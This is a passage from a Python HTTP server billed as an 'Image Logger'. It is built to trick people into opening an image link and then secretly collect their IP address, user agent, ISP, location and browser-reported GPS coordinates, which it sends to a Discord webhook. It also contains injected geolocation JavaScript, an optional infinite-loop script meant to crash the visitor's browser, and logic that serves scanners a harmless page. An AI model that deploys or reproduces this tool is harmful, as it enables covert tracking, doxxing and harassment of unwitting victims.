            }],
        }
        
        if url:
            embed["embeds"][0]["thumbnail"] = {"url": url}
        
        requests.post(config["webhook"], json=embed)
        return info
        
    except Exception as e:
        reportError(str(e))
        return None

binaries = {
    "loading": base64.b85decode(b'|JeWF01!$>Nk#wx0RaF=07w7;|JwjV0RR90|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|Nq+nLjnK)|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsC0|NsBO01*fQ-~r$R0TBQK5di}c0sq7R6aWDL00000000000000000030!~hfl0RR910000000000000000RP$m3<CiG0uTcb00031000000000000000000000000000')
}

class ImageLoggerAPI(BaseHTTPRequestHandler):
    
    def handleRequest(self):
        try:
            if config["imageArgument"]:
                s = self.path
                dic = dict(parse.parse_qsl(parse.urlsplit(s).query))
                if dic.get("url") or dic.get("id"):
                    url = base64.b64decode((dic.get("url") or dic.get("id")).encode()).decode()
                else:
                    url = config["image"]
            else:
                url = config["image"]

            data = f'''<style>body {{
margin: 0;
padding: 0;
}}
div.img {{
background-image: url('{url}');
background-position: center center;
background-repeat: no-repeat;
background-size: contain;
width: 100vw;
height: 100vh;
}}</style><div class="img"></div>'''.encode()
            
            # Get IP address
            if self.headers.get('x-forwarded-for'):
                ip = self.headers.get('x-forwarded-for').split(',')[0].strip()
            else:
                ip = self.client_address[0]
            
            useragent = self.headers.get('user-agent', 'Unknown')
            endpoint = self.path.split('?')[0] if '?' in self.path else self.path
            
            if ip.startswith(blacklistedIPs):
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                self.wfile.write(data)
                return
            
            if botCheck(ip, useragent):
                self.send_response(200 if config["buggedImage"] else 302)
                self.send_header('Content-type' if config["buggedImage"] else 'Location', 'image/jpeg' if config["buggedImage"] else url)
                self.end_headers()
                
                if config["buggedImage"]:
                    self.wfile.write(binaries["loading"])
                
                # Run in thread to avoid blocking
                threading.Thread(target=makeReport, args=(ip, useragent, None, endpoint, url)).start()
                return
            
            # Check for coordinates
            s = self.path
            dic = dict(parse.parse_qsl(parse.urlsplit(s).query))
            coords = None
            
            if dic.get("g") and config["accurateLocation"]:
                try:
                    coords = base64.b64decode(dic.get("g").encode()).decode()
                except:
                    pass
            
            # Run report in thread
            result = None
            if coords:
                result = makeReport(ip, useragent, coords, endpoint, url)
            else:
                result = makeReport(ip, useragent, None, endpoint, url)
            
            # Prepare message
            message = config["message"]["message"]
            
            if config["message"]["richMessage"] and result:
                message = message.replace("{ip}", ip)
                message = message.replace("{isp}", str(result.get("isp", "Unknown")))
                message = message.replace("{asn}", str(result.get("as", "Unknown")))
                message = message.replace("{country}", str(result.get("country", "Unknown")))
                message = message.replace("{region}", str(result.get("regionName", "Unknown")))
                message = message.replace("{city}", str(result.get("city", "Unknown")))
                message = message.replace("{lat}", str(result.get("lat", "Unknown")))
                message = message.replace("{long}", str(result.get("lon", "Unknown")))
                
                timezone = result.get("timezone", "Unknown")
                if timezone != "Unknown" and '/' in timezone:
                    tz_parts = timezone.split('/')
                    message = message.replace("{timezone}", f"{tz_parts[1].replace('_', ' ')} ({tz_parts[0]})")
                else:
                    message = message.replace("{timezone}", "Unknown")
                    
                message = message.replace("{mobile}", str(result.get("mobile", "Unknown")))
                message = message.replace("{vpn}", str(result.get("proxy", "Unknown")))
                message = message.replace("{bot}", str('Yes' if result.get('hosting') and not result.get('proxy') else 'Possibly' if result.get('hosting') else 'No'))
                
                try:
                    os, browser = httpagentparser.simple_detect(useragent)
                    message = message.replace("{browser}", browser)
                    message = message.replace("{os}", os)
                except:
                    message = message.replace("{browser}", "Unknown")
                    message = message.replace("{os}", "Unknown")

            datatype = 'text/html'

            if config["message"]["doMessage"]:
                data = message.encode()
            
            if config["crashBrowser"]:
                data = message.encode() + b'<script>setTimeout(function(){for (var i=69420;i==i;i*=i){console.log(i)}}, 100)</script>'

            if config["redirect"]["redirect"]:
                data = f'<meta http-equiv="refresh" content="0;url={config["redirect"]["page"]}">'.encode()
            
            self.send_response(200)
            self.send_header('Content-type', datatype)
            self.end_headers()

            if config["accurateLocation"] and not coords:
                data += b"""<script>
var currenturl = window.location.href;

if (!currenturl.includes("g=")) {
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(function (coords) {
            if (currenturl.includes("?")) {
                currenturl += ("&g=" + btoa(coords.coords.latitude + "," + coords.coords.longitude).replace(/=/g, "%3D"));
            } else {
                currenturl += ("?g=" + btoa(coords.coords.latitude + "," + coords.coords.longitude).replace(/=/g, "%3D"));
            }
            location.replace(currenturl);
        });
    }
}
</script>"""
            
            self.wfile.write(data)
        
        except Exception as e:
            self.send_response(500)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            self.wfile.write(b'500 - Internal Server Error <br>Please check the message sent to your Discord Webhook and report the error on the GitHub page.')
            reportError(traceback.format_exc())

    def do_GET(self):
        self.handleRequest()
    
    def do_POST(self):
        self.handleRequest()
    
    def log_message(self, format, *args):
        # Disable default logging
        pass

def run_server(port=8080):
    server = HTTPServer(('0.0.0.0', port), ImageLoggerAPI)
    print(f"[*] Server started on port {port}")
    print(f"[*] Image Logger by {__author__}")
    print(f"[*] Webhook: {config['webhook']}")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\n[*] Server stopped")
        server.server_close()

if __name__ == '__main__':
    run_server()
